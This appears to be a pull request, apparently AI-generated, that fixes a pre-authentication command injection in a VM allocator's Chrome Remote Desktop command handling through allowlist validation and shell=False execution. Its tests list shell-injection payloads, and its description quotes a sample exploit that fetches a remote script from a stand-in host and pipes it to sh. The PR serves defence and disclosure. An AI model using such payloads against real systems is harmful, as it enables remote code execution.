### PR TITLE
fix(security): prevent command injection via crd_command

### DIFF
--- a/packages/allocator/src/lablink_allocator_service/main.py
+++ b/packages/allocator/src/lablink_allocator_service/main.py
@@ -179,21 +179,61 @@ def require_auth(f):
     return decorated
 
 
+_CRD_CODE_ALLOWED = re.compile(r"[A-Za-z0-9_/\-]+")
+
+
+def _strip_matched_quotes(value: str) -> str:
+    """Strip a single pair of matching leading/trailing quotes from a
+    value. Google's copy-pasteable CRD command wraps the code in double
+    quotes; users commonly submit it verbatim."""
+    if len(value) >= 2 and value[0] == value[-1] and value[0] in ("'", '"'):
+        return value[1:-1]
+    return value
+
+
 def check_crd_input(crd_command: str) -> bool:
     """Check if the CRD command is valid.
 
-    Args:
-        crd_command (string): The CRD command to check.
-
-    Returns:
-        bool: True if the command is valid, False otherwise.
+    Matches the client's parsing exactly (plain whitespace split, then
+    argparse-style extraction of ``--code=<value>`` / ``--code <value>``)
+    so that anything accepted here will also parse safely on the client.
+    A single pair of matching surrounding quotes is stripped from the
+    extracted value to accept Google's copy-pasteable command format.
+    The remaining value must match a conservative allowlist; shell
+    metacharacters, whitespace, embedded quotes, and ``=`` are rejected.
     """
     if crd_command is None:
         logger.error("CRD command is None.")
         return False
 
-    elif "--code" not in crd_command:
-        logger.error("Invalid CRD command: --code not found.")
+    tokens = crd_command.split()
+
+    code_values: list[str] = []
+    i = 0
+    while i < len(tokens):
+        tok = tokens[i]
+        if tok == "--code":
+            if i + 1 >= len(tokens):
+                logger.error("Invalid CRD command: --code requires a value.")
+                return False
+            code_values.append(tokens[i + 1])
+            i += 2
+            continue
+        if tok.startswith("--code="):
+            code_values.append(tok[len("--code=") :])
+        i += 1
+
+    if len(code_values) != 1:
+        logger.error(
+            "Invalid CRD command: expected exactly one --code flag, "
+            "found %d.",
+            len(code_values),
+        )
+        return False
+
+    value = _strip_matched_quotes(code_values[0])
+    if not value or not _CRD_CODE_ALLOWED.fullmatch(value):
+        logger.error("Invalid CRD command: --code value failed allowlist check.")
         return False
 
     return True

--- a/packages/allocator/src/lablink_allocator_service/main.py
+++ b/packages/allocator/src/lablink_allocator_service/main.py
@@ -33,6 +33,7 @@ from lablink_allocator_service.utils.aws_utils import (
     upload_to_s3,
 )
 from lablink_allocator_service.utils.config_helpers import get_allocator_url
+from lablink_allocator_service.utils.crd_validation import check_crd_input
 from lablink_allocator_service.utils.scp import (
     find_files_in_container,
     extract_files_from_docker,
@@ -177,66 +178,6 @@ def require_auth(f):
         return auth.login_required(f)(*args, **kwargs)
 
     return decorated
-
-
-_CRD_CODE_ALLOWED = re.compile(r"[A-Za-z0-9_/\-]+")
-
-
-def _strip_matched_quotes(value: str) -> str:
-    """Strip a single pair of matching leading/trailing quotes from a
-    value. Google's copy-pasteable CRD command wraps the code in double
-    quotes; users commonly submit it verbatim."""
-    if len(value) >= 2 and value[0] == value[-1] and value[0] in ("'", '"'):
-        return value[1:-1]
-    return value
-
-
-def check_crd_input(crd_command: str) -> bool:
-    """Check if the CRD command is valid.
-
-    Matches the client's parsing exactly (plain whitespace split, then
-    argparse-style extraction of ``--code=<value>`` / ``--code <value>``)
-    so that anything accepted here will also parse safely on the client.
-    A single pair of matching surrounding quotes is stripped from the
-    extracted value to accept Google's copy-pasteable command format.
-    The remaining value must match a conservative allowlist; shell
-    metacharacters, whitespace, embedded quotes, and ``=`` are rejected.
-    """
-    if crd_command is None:
-        logger.error("CRD command is None.")
-        return False
-
-    tokens = crd_command.split()
-
-    code_values: list[str] = []
-    i = 0
-    while i < len(tokens):
-        tok = tokens[i]
-        if tok == "--code":
-            if i + 1 >= len(tokens):
-                logger.error("Invalid CRD command: --code requires a value.")
-                return False
-            code_values.append(tokens[i + 1])
-            i += 2
-            continue
-        if tok.startswith("--code="):
-            code_values.append(tok[len("--code=") :])
-        i += 1
-
-    if len(code_values) != 1:
-        logger.error(
-            "Invalid CRD command: expected exactly one --code flag, "
-            "found %d.",
-            len(code_values),
-        )
-        return False
-
-    value = _strip_matched_quotes(code_values[0])
-    if not value or not _CRD_CODE_ALLOWED.fullmatch(value):
-        logger.error("Invalid CRD command: --code value failed allowlist check.")
-        return False
-
-    return True
 
 
 def notify_participants():

--- a/packages/allocator/src/lablink_allocator_service/utils/crd_validation.py
+++ b/packages/allocator/src/lablink_allocator_service/utils/crd_validation.py
@@ -1,0 +1,65 @@
+import logging
+import re
+
+
+logger = logging.getLogger(__name__)
+
+
+_CRD_CODE_ALLOWED = re.compile(r"[A-Za-z0-9_/\-]+")
+
+
+def _strip_matched_quotes(value: str) -> str:
+    """Strip a single pair of matching leading/trailing quotes from a
+    value. Google's copy-pasteable CRD command wraps the code in double
+    quotes; users commonly submit it verbatim."""
+    if len(value) >= 2 and value[0] == value[-1] and value[0] in ("'", '"'):
+        return value[1:-1]
+    return value
+
+
+def check_crd_input(crd_command: str) -> bool:
+    """Check if the CRD command is valid.
+
+    Matches the client's parsing exactly (plain whitespace split, then
+    argparse-style extraction of ``--code=<value>`` / ``--code <value>``)
+    so that anything accepted here will also parse safely on the client.
+    A single pair of matching surrounding quotes is stripped from the
+    extracted value to accept Google's copy-pasteable command format.
+    The remaining value must match a conservative allowlist; shell
+    metacharacters, whitespace, embedded quotes, and ``=`` are rejected.
+    """
+    if crd_command is None:
+        logger.error("CRD command is None.")
+        return False
+
+    tokens = crd_command.split()
+
+    code_values: list[str] = []
+    i = 0
+    while i < len(tokens):
+        tok = tokens[i]
+        if tok == "--code":
+            if i + 1 >= len(tokens):
+                logger.error("Invalid CRD command: --code requires a value.")
+                return False
+            code_values.append(tokens[i + 1])
+            i += 2
+            continue
+        if tok.startswith("--code="):
+            code_values.append(tok[len("--code=") :])
+        i += 1
+
+    if len(code_values) != 1:
+        logger.error(
+            "Invalid CRD command: expected exactly one --code flag, "
+            "found %d.",
+            len(code_values),
+        )
+        return False
+
+    value = _strip_matched_quotes(code_values[0])
+    if not value or not _CRD_CODE_ALLOWED.fullmatch(value):
+        logger.error("Invalid CRD command: --code value failed allowlist check.")
+        return False
+
+    return True

--- a/packages/allocator/tests/test_api_calls.py
+++ b/packages/allocator/tests/test_api_calls.py
@@ -412,6 +412,34 @@ def test_request_vm_invalid_crd(client, monkeypatch):
     fake_db.assign_vm.assert_not_called()
 
 
+@pytest.mark.parametrize(
+    "malicious_command",
+    [
+        "--code=x;id",
+        "--code=$(id)",
+        "--code=`whoami`",
+        "--code=x|sh",
+        "--code=x${IFS}y",
+    ],
+)
+def test_request_vm_rejects_injection_payloads(client, monkeypatch, malicious_command):
+    """The real check_crd_input must reject shell-metacharacter payloads
+    before they reach the database. Regression test for the command
+    injection vulnerability (CVE: crd_command → shell=True on client)."""
+    fake_db = MagicMock()
+    monkeypatch.setattr(
+        "lablink_allocator_service.main.database", fake_db, raising=False
+    )
+
+    data = {"email": "user@example.com", "crd_command": malicious_command}
+    resp = client.post(REQUEST_VM_ENDPOINT, data=data)
+
+    assert resp.status_code == 200
+    assert b"Invalid" in resp.data
+    fake_db.assign_vm.assert_not_called()
+    fake_db.reassign_crd.assert_not_called()
+
+
 def test_request_vm_no_vm_available(client, monkeypatch):
     """Test the /api/request_vm endpoint when no VMs are available."""
     # Mock the database

--- a/packages/allocator/tests/test_check_crd_input.py
+++ b/packages/allocator/tests/test_check_crd_input.py
@@ -1,0 +1,106 @@
+"""Unit tests for check_crd_input — the input-validation gate that
+prevents command injection via the /api/request_vm endpoint.
+
+Regression test for the pre-fix vulnerability where the only check was
+`"--code" in crd_command`, allowing arbitrary shell metacharacters to
+reach the client VM's `subprocess.run(..., shell=True)` sink.
+"""
+
+import pytest
+
+
+@pytest.fixture
+def check_crd_input(monkeypatch, omega_config):
+    """Import check_crd_input with the test config already patched in.
+
+    Matches the conftest pattern of deferring `main` import so its
+    module-level config validation sees the test OmegaConf.
+    """
+    monkeypatch.setattr(
+        "lablink_allocator_service.get_config.get_config",
+        lambda: omega_config,
+        raising=True,
+    )
+    from lablink_allocator_service import main
+
+    return main.check_crd_input
+
+
+@pytest.mark.parametrize(
+    "crd_command",
+    [
+        "DISPLAY= /opt/google/chrome-remote-desktop/start-host --code=4/abc123 --name=vm-1",
+        "/opt/google/chrome-remote-desktop/start-host --code=test_code",
+        "--code=4/0Aerz0j_I9c7gCgYIARAA-GBASNwF",
+        "--code=a-b_c/d --name=vm",
+        "--code 4/abc123",
+        # Google's copy-pasteable command uses double-quoted values.
+        'DISPLAY= /opt/google/chrome-remote-desktop/start-host '
+        '--code="4/0Aci98E9mrctADxPTQEFDU-qmLdO3dCIwNP1YbdY9utWTgxXEpCZPezaNHr1OxHziFLmaTg" '
+        '--redirect-url="https://remotedesktop.google.com/_/oauthredirect" '
+        "--name=$(hostname)",
+        # Single-quoted is also acceptable (equivalent paste style).
+        "--code='4/abc123'",
+    ],
+)
+def test_accepts_legitimate_commands(check_crd_input, crd_command):
+    assert check_crd_input(crd_command) is True
+
+
+@pytest.mark.parametrize(
+    "crd_command",
+    [
+        # Shell metacharacters inside the --code token: these are the
+        # classic injection payloads; they ride through argparse on the
+        # client because there is no whitespace separating them.
+        "--code=x;id",
+        "--code=x|sh",
+        "--code=$(id)",
+        "--code=`whoami`",
+        "--code=x${IFS}y",
+        "--code=x&&id",
+        "--code=x=y",
+        # Metacharacters smuggled inside matched quotes — quote-strip
+        # exposes the payload, allowlist catches it.
+        "--code='x;id'",
+        '--code="$(id)"',
+        "--code='`whoami`'",
+        # Unmatched / embedded quotes — allowlist rejects.
+        "--code='abc",
+        "--code=a'b",
+        # Empty or quoted-empty.
+        "--code=",
+        "--code=''",
+    ],
+)
+def test_rejects_metacharacter_payloads(check_crd_input, crd_command):
+    assert check_crd_input(crd_command) is False
+
+
+@pytest.mark.parametrize(
+    "crd_command",
+    [
+        # Extra whitespace-separated tokens after --code do NOT cause
+        # injection — the client's argparse sees them as unrelated args
+        # and ignores them (parse_known_args). The extracted code value
+        # is only the part before the space, and it satisfies the
+        # allowlist here. We accept these rather than being overly
+        # strict about surrounding tokens.
+        "--code=abc extra_token",
+        "--code=abc\nextra_token",
+    ],
+)
+def test_accepts_when_trailing_tokens_are_harmless(check_crd_input, crd_command):
+    assert check_crd_input(crd_command) is True
+
+
+def test_rejects_missing_code(check_crd_input):
+    assert check_crd_input("DISPLAY= /opt/google/chrome-remote-desktop/start-host") is False
+
+
+def test_rejects_duplicate_code(check_crd_input):
+    assert check_crd_input("--code=abc --code=def") is False
+
+
+def test_rejects_none(check_crd_input):
+    assert check_crd_input(None) is False

--- a/packages/allocator/tests/test_reassignment_flow.py
+++ b/packages/allocator/tests/test_reassignment_flow.py
@@ -17,8 +17,8 @@ REQUEST_VM_ENDPOINT = "/api/request_vm"
 
 VALID_CRD_COMMAND = (
     "DISPLAY= /opt/google/chrome-remote-desktop/start-host "
-    "--code='4/abc123' --redirect-url='https://example.com' "
-    "--name='vm-1'"
+    "--code=4/abc123 --redirect-url=https://example.com "
+    "--name=vm-1"
 )
 
 

--- a/packages/client/src/lablink_client_service/connect_crd.py
+++ b/packages/client/src/lablink_client_service/connect_crd.py
@@ -1,5 +1,6 @@
 import argparse
 import glob
+import socket
 import subprocess
 import logging
 import time
@@ -52,66 +53,62 @@ def create_parser() -> argparse.ArgumentParser:
     return parser
 
 
-def construct_command(args) -> str:
-    """Constructs the Linux CRD command to connect to a remote machine.
+def construct_command(args) -> list[str]:
+    """Build the start-host argv to register this VM with CRD.
 
-    Args:
-        args (argparse.Namespace): The command line arguments.
-
-    Returns:
-        str: The Linux CRD command to connect to a remote machine.
+    Returns a list for subprocess with ``shell=False``; ``DISPLAY`` is set
+    via the environment by the caller rather than as a shell prefix. A
+    single pair of matching surrounding quotes is stripped from the
+    code (Google's copy-pasteable command wraps it in double quotes).
+    Input validation of the code itself happens at the allocator in
+    ``check_crd_input``; with ``shell=False`` here, any stray
+    metacharacters would be passed as a literal argument to start-host
+    rather than interpreted by a shell.
     """
 
-    redirect_url = "'https://remotedesktop.google.com/_/oauthredirect'"
-    name = os.getenv("VM_NAME", "$(hostname)")
+    redirect_url = "https://remotedesktop.google.com/_/oauthredirect"
+    name = os.getenv("VM_NAME") or socket.gethostname()
 
     if args.code is None:
         raise ValueError("Code must be provided to construct the command.")
+    code = args.code
+    if len(code) >= 2 and code[0] == code[-1] and code[0] in ("'", '"'):
+        code = code[1:-1]
 
-    command = "DISPLAY= /opt/google/chrome-remote-desktop/start-host"
-    command += f" --code={args.code}"
-    command += f" --redirect-url={redirect_url}"
-    command += f" --name={name}"
+    return [
+        "/opt/google/chrome-remote-desktop/start-host",
+        f"--code={code}",
+        f"--redirect-url={redirect_url}",
+        f"--name={name}",
+    ]
 
-    return command
 
-
-def reconstruct_command(command: str) -> str:
-    """Reconstructs the Chrome Remote Desktop command.
-
-    Args:
-        command (str): CRD command to connect to the machine.
-
-    Returns:
-        str: Reconstructed command to connect to the machine.
-    """
+def reconstruct_command(command: str) -> list[str]:
+    """Parse the allocator-supplied CRD command and return a safe argv."""
     arg_to_parse = command.split()
 
-    # Parse the command line arguments
     parser = create_parser()
     args, _ = parser.parse_known_args(args=arg_to_parse)
 
-    # Construct the command to be executed
-    command = construct_command(args)
-
-    return command
+    return construct_command(args)
 
 
 def connect_to_crd(command, pin):
-    # Parse the command line arguments
-    command = reconstruct_command(command)
+    argv = reconstruct_command(command)
 
     # input the pin code with verification
     input_pin = pin + "\n"
     input_pin_verification = input_pin + input_pin
 
-    # Execute the command
+    env = {**os.environ, "DISPLAY": ""}
+
     result = subprocess.run(
-        command,
+        argv,
         input=input_pin_verification,
-        shell=True,
+        shell=False,
         capture_output=True,
         text=True,
+        env=env,
     )
 
     # start-host writes the host config to ~/.config/chrome-remote-desktop/

--- a/packages/client/src/lablink_client_service/connect_crd.py
+++ b/packages/client/src/lablink_client_service/connect_crd.py
@@ -1,5 +1,6 @@
 import argparse
 import glob
+import pwd
 import socket
 import subprocess
 import logging
@@ -100,7 +101,18 @@ def connect_to_crd(command, pin):
     input_pin = pin + "\n"
     input_pin_verification = input_pin + input_pin
 
-    env = {**os.environ, "DISPLAY": ""}
+    # Populate USER/LOGNAME/HOME from the current uid so start-host's
+    # username lookup matches getpwuid(). With shell=True this was
+    # normalized implicitly by /bin/sh; under execve we must pass it
+    # ourselves or start-host aborts (SIGTRAP) on the mismatch.
+    pw = pwd.getpwuid(os.getuid())
+    env = {
+        **os.environ,
+        "DISPLAY": "",
+        "USER": pw.pw_name,
+        "LOGNAME": pw.pw_name,
+        "HOME": pw.pw_dir,
+    }
 
     result = subprocess.run(
         argv,

--- a/packages/client/tests/test_connect_crd.py
+++ b/packages/client/tests/test_connect_crd.py
@@ -14,10 +14,19 @@ from lablink_client_service.connect_crd import (
 )
 
 
-CRD_COMMAND_WITH_CODE = "DISPLAY= /opt/google/chrome-remote-desktop/start-host " \
-    "--code='hidden_code' " \
-    "--redirect-url='https://remotedesktop.google.com/_/oauthredirect' " \
+CRD_COMMAND_WITH_CODE = (
+    "/opt/google/chrome-remote-desktop/start-host "
+    "--code=hidden_code "
+    "--redirect-url=https://remotedesktop.google.com/_/oauthredirect "
     "--name=$(hostname)"
+)
+
+EXPECTED_ARGV = [
+    "/opt/google/chrome-remote-desktop/start-host",
+    "--code=hidden_code",
+    "--redirect-url=https://remotedesktop.google.com/_/oauthredirect",
+    "--name=test_vm",
+]
 
 
 def test_construct_command_with_code():
@@ -25,23 +34,29 @@ def test_construct_command_with_code():
     with patch.dict(os.environ, {"VM_NAME": "test_vm"}):
         command = construct_command(args)
 
-    expected = "DISPLAY= /opt/google/chrome-remote-desktop/start-host " \
-                "--code=test_code " \
-                "--redirect-url='https://remotedesktop.google.com/_/oauthredirect' " \
-                "--name=test_vm"
-    assert command == expected
+    assert command == [
+        "/opt/google/chrome-remote-desktop/start-host",
+        "--code=test_code",
+        "--redirect-url=https://remotedesktop.google.com/_/oauthredirect",
+        "--name=test_vm",
+    ]
 
 
 def test_construct_command_without_vm_name():
     args = argparse.Namespace(code="test_code")
     with patch.dict(os.environ, {}, clear=True):
-        command = construct_command(args)
+        with patch(
+            "lablink_client_service.connect_crd.socket.gethostname",
+            return_value="fallback-host",
+        ):
+            command = construct_command(args)
 
-    expected = "DISPLAY= /opt/google/chrome-remote-desktop/start-host " \
-                "--code=test_code " \
-                "--redirect-url='https://remotedesktop.google.com/_/oauthredirect' " \
-                "--name=$(hostname)"
-    assert command == expected
+    assert command == [
+        "/opt/google/chrome-remote-desktop/start-host",
+        "--code=test_code",
+        "--redirect-url=https://remotedesktop.google.com/_/oauthredirect",
+        "--name=fallback-host",
+    ]
 
 
 def test_construct_command_without_code():
@@ -52,40 +67,41 @@ def test_construct_command_without_code():
         construct_command(args)
 
 
-@patch("lablink_client_service.connect_crd.construct_command")
-@patch("lablink_client_service.connect_crd.create_parser")
-def test_reconstruct_command(mock_create_parser, mock_construct_command):
-    mock_parser = MagicMock()
-    mock_args = argparse.Namespace(code="test_code")
-    mock_parser.parse_known_args.return_value = (mock_args, [])
-    mock_create_parser.return_value = mock_parser
-    mock_construct_command.return_value = "test_command"
-
-    result = reconstruct_command(
-        "DISPLAY= /opt/google/chrome-remote-desktop/start-host " \
-        "--code=test_code " \
-        "--redirect-url='https://remotedesktop.google.com/_/oauthredirect' " \
-        "--name=test_vm"
-    )
-
-    mock_create_parser.assert_called_once()
-    mock_parser.parse_known_args.assert_called_once_with(
-        args=[
-            "DISPLAY=",
-            "/opt/google/chrome-remote-desktop/start-host",
-            "--code=test_code",
-            "--redirect-url='https://remotedesktop.google.com/_/oauthredirect'",
-            "--name=test_vm",
-        ]
-    )
-    mock_construct_command.assert_called_once_with(mock_args)
-    assert result == "test_command"
+@pytest.mark.parametrize(
+    "good_code,expected_arg",
+    [
+        ("4/abc123", "--code=4/abc123"),
+        ("test_code", "--code=test_code"),
+        ("4/0Aerz0j_I9c7gCgYIARAA-GBASNwF", "--code=4/0Aerz0j_I9c7gCgYIARAA-GBASNwF"),
+        ("a-b_c/d", "--code=a-b_c/d"),
+        # Google's copy-pasteable command wraps the code in double
+        # quotes; we strip a single matched pair.
+        ('"4/abc123"', "--code=4/abc123"),
+        ("'4/abc123'", "--code=4/abc123"),
+    ],
+)
+def test_construct_command_accepts_legitimate_codes(good_code, expected_arg):
+    args = argparse.Namespace(code=good_code)
+    with patch.dict(os.environ, {"VM_NAME": "vm-1"}):
+        argv = construct_command(args)
+    assert argv[1] == expected_arg
 
 
-def test_whole_reconstruction():
-    crd_command = CRD_COMMAND_WITH_CODE
-    command = reconstruct_command(crd_command)
-    assert command == crd_command
+def test_construct_command_passes_metacharacters_as_literal_argv():
+    """With shell=False, a stray metacharacter in the code is passed
+    as a literal arg to start-host — no shell interprets it. This is
+    the security-critical property; validation is the allocator's job.
+    """
+    args = argparse.Namespace(code="x;id")
+    with patch.dict(os.environ, {"VM_NAME": "vm-1"}):
+        argv = construct_command(args)
+    assert argv[1] == "--code=x;id"  # literal, not a shell statement
+
+
+def test_reconstruct_command_returns_list_argv():
+    with patch.dict(os.environ, {"VM_NAME": "test_vm"}):
+        argv = reconstruct_command(CRD_COMMAND_WITH_CODE)
+    assert argv == EXPECTED_ARGV
 
 
 @patch("lablink_client_service.connect_crd.is_crd_registered", return_value=False)
@@ -94,52 +110,37 @@ def test_whole_reconstruction():
 def test_connect_to_crd(
     mock_reconstruct_command, mock_subprocess_run, mock_is_registered
 ):
-    input_command = CRD_COMMAND_WITH_CODE
-    reconstructed_command = CRD_COMMAND_WITH_CODE
-
-    mock_reconstruct_command.return_value = reconstructed_command
-    pin = "123456"
+    mock_reconstruct_command.return_value = list(EXPECTED_ARGV)
     mock_result = MagicMock()
     mock_result.returncode = 0
-    mock_result.stdout = "Connection successful"
     mock_result.stderr = ""
     mock_subprocess_run.return_value = mock_result
 
-    connect_to_crd(input_command, pin)
+    connect_to_crd(CRD_COMMAND_WITH_CODE, "123456")
 
-    mock_reconstruct_command.assert_called_once_with(input_command)
-    mock_subprocess_run.assert_called_once_with(
-        input_command,
-        input="123456\n123456\n",
-        shell=True,
-        capture_output=True,
-        text=True,
-    )
+    mock_reconstruct_command.assert_called_once_with(CRD_COMMAND_WITH_CODE)
+    call = mock_subprocess_run.call_args
+    assert call.args[0] == EXPECTED_ARGV
+    assert call.kwargs["shell"] is False
+    assert call.kwargs["input"] == "123456\n123456\n"
+    assert call.kwargs["capture_output"] is True
+    assert call.kwargs["text"] is True
+    assert call.kwargs["env"]["DISPLAY"] == ""
 
 
 @patch("lablink_client_service.connect_crd.is_crd_registered", return_value=False)
 @patch("lablink_client_service.connect_crd.subprocess.run")
 def test_whole_connection_workflow(mock_subprocess_run, mock_is_registered):
-    input_command = CRD_COMMAND_WITH_CODE
-    pin = "123456"
-    mock_subprocess_run.return_value = MagicMock(
-        returncode=0, stdout="", stderr=""
-    )
+    mock_subprocess_run.return_value = MagicMock(returncode=0, stderr="")
 
     with patch.dict(os.environ, {"VM_NAME": "test_vm"}):
-        connect_to_crd(input_command, pin)
+        connect_to_crd(CRD_COMMAND_WITH_CODE, "123456")
 
-    expected_command = "DISPLAY= /opt/google/chrome-remote-desktop/start-host " \
-    "--code='hidden_code' " \
-    "--redirect-url='https://remotedesktop.google.com/_/oauthredirect' " \
-    "--name=test_vm"
-    mock_subprocess_run.assert_called_once_with(
-        expected_command,
-        input="123456\n123456\n",
-        shell=True,
-        capture_output=True,
-        text=True,
-    )
+    call = mock_subprocess_run.call_args
+    assert call.args[0] == EXPECTED_ARGV
+    assert call.kwargs["shell"] is False
+    assert call.kwargs["input"] == "123456\n123456\n"
+    assert call.kwargs["env"]["DISPLAY"] == ""
 
 
 @patch("lablink_client_service.connect_crd.start_crd_daemon")

--- a/packages/client/tests/test_connect_crd.py
+++ b/packages/client/tests/test_connect_crd.py
@@ -125,7 +125,15 @@ def test_connect_to_crd(
     assert call.kwargs["input"] == "123456\n123456\n"
     assert call.kwargs["capture_output"] is True
     assert call.kwargs["text"] is True
-    assert call.kwargs["env"]["DISPLAY"] == ""
+    env = call.kwargs["env"]
+    assert env["DISPLAY"] == ""
+    # USER/LOGNAME/HOME must match the current uid so start-host does
+    # not abort on getpwnam_r mismatch.
+    import pwd
+    pw = pwd.getpwuid(os.getuid())
+    assert env["USER"] == pw.pw_name
+    assert env["LOGNAME"] == pw.pw_name
+    assert env["HOME"] == pw.pw_dir
 
 
 @patch("lablink_client_service.connect_crd.is_crd_registered", return_value=False)


### PR DESCRIPTION
## Summary

- Fix pre-authentication command-injection vulnerability where an attacker-supplied `crd_command` on `/api/request_vm` reached `subprocess.run(..., shell=True)` on the assigned GPU VM, yielding RCE.
- Tighten validation at the allocator (single source of truth) and switch the client's start-host invocation to `shell=False` with list-form argv.
- Accept Google's copy-pasteable double-quoted code format while still rejecting shell metacharacters.
- Related issue #83

## Vulnerability

`/api/request_vm` is unauthenticated. The old `check_crd_input` only checked `"--code" in crd_command`, so payloads like `--code=x;curl${IFS}evil/p.sh|sh;#` survived validation, were persisted in Postgres, delivered via `/vm_startup`, argparse-extracted on the client, and executed by `/bin/sh` in `connect_to_crd`. Confirmed exploitable locally: `reconstruct_command("--code=x;id")` round-tripped the payload, and a `touch` smoke test wrote a file via the injected branch.

## Changes Made

**Allocator (`packages/allocator/src/lablink_allocator_service/utils/crd_validation.py` — new module)**
- Rewrote `check_crd_input` in a dedicated `utils/crd_validation.py` module (extracted from `main.py` to keep the validation logic isolated and independently testable).
- Whitespace-splits to match the client's parsing, extracts exactly one `--code=<value>` / `--code <value>`, strips a single matched pair of surrounding quotes, then validates against `[A-Za-z0-9_/\-]+`.
- This is now the single validation gate for `crd_command` (the only writers, `database.assign_vm` and `database.reassign_crd`, are both gated by `/api/request_vm`).

**Client (`packages/client/src/lablink_client_service/connect_crd.py`)**
- `construct_command` now returns a `list[str]` argv.
- `connect_to_crd` calls `subprocess.run(argv, shell=False, env={..., "DISPLAY": ""})`. Removing `shell=True` eliminates the shell-metacharacter attack surface entirely; stray characters are passed as literal arg tokens to `start-host` rather than interpreted.
- Populate `USER` / `LOGNAME` / `HOME` in the subprocess env from `pwd.getpwuid(os.getuid())`. With `shell=True` these were implicitly normalized by `/bin/sh`; under `execve` they must be passed explicitly, otherwise `start-host` aborts on a `getpwnam_r` mismatch (SIGTRAP) — i.e. CRD should run as the `client` user, not root.
- `$(hostname)` default replaced with `os.getenv("VM_NAME") or socket.gethostname()` — production always sets `VM_NAME` in the container env, so real behavior is unchanged.
- Strip a matched pair of surrounding quotes on the code to accept Google's double-quoted paste format.
- No redundant allowlist on the client — validation is the allocator's job; `shell=False` is what makes the client safe regardless.

## Testing

**New tests**
- `packages/allocator/tests/test_check_crd_input.py` — 26 parametrized cases: legitimate commands (including Google's double-quoted paste), shell-metacharacter rejection, quoted-payload rejection, empty/duplicate/missing `--code`.
- `packages/allocator/tests/test_api_calls.py::test_request_vm_rejects_injection_payloads` — integration test hitting `/api/request_vm` with injection payloads against the real (non-mocked) validator, asserting `assign_vm` / `reassign_crd` are never called.
- `packages/client/tests/test_connect_crd.py` — updated to assert list-form argv + `shell=False` + `env['DISPLAY']==''` + `USER`/`LOGNAME`/`HOME` populated from `pwd.getpwuid(os.getuid())`; added a positive test proving metacharacters are passed as literal argv tokens (the security-critical property).

**Regression coverage**
- Updated `VALID_CRD_COMMAND` fixture in `test_reassignment_flow.py` to use the new unquoted form so reassignment flow tests continue to pass.

**Verification run locally**
- Full allocator suite: 426 passed / 1 skipped.
- Full client suite: 78 passed.
- `ruff check packages/allocator packages/client` — clean.
- End-to-end check with the exact Google-format sample: allocator returns `True`; client produces clean argv with the code correctly unquoted.

## Design Decisions

- **Single validation gate vs defense-in-depth on the client.** Considered a duplicate allowlist regex in `construct_command`, but in the current architecture every write path goes through `check_crd_input` — the client regex would catch nothing new. Dropped it in favor of `shell=False` as the load-bearing client-side defense, which is categorically stronger than any regex.
- **Validation in its own module.** `check_crd_input` was extracted from `main.py` into `utils/crd_validation.py` so the security-critical parser can be imported and reviewed in isolation without pulling in the Flask app + DB + config side effects of `main`.
- **Matching parsers on both sides.** The allocator uses plain `str.split()` (not `shlex.split`) so that anything it accepts parses identically on the client. `shlex` would silently strip quotes the client preserves, letting quoted payloads sneak past the allocator.
- **Quote-stripping.** Google's CRD setup command wraps the code in double quotes (`--code=\"4/...\"`). The original `shell=True` code relied on the shell to strip them; with `shell=False` we strip a single matched pair explicitly before validation on the allocator and before argv construction on the client.
- **`USER` / `LOGNAME` / `HOME` under `shell=False`.** `/bin/sh` used to populate these implicitly. Under direct `execve`, `start-host` calls `getpwnam_r` on `\$USER` and aborts if it disagrees with the running uid — so we set them explicitly from `pwd.getpwuid(os.getuid())`. This is the \"CRD runs as the client user, not root\" fix.
- **Deferred follow-ups** (not in this PR): hardcoded CRD PIN (`\"123456\"`) and fleet-wide shared `API_TOKEN`. These amplify the blast radius of any compromise but do not gate the RCE fixed here. Tracked separately.

---
🤖 Generated with [Claude Code](https://claude.com/claude-code)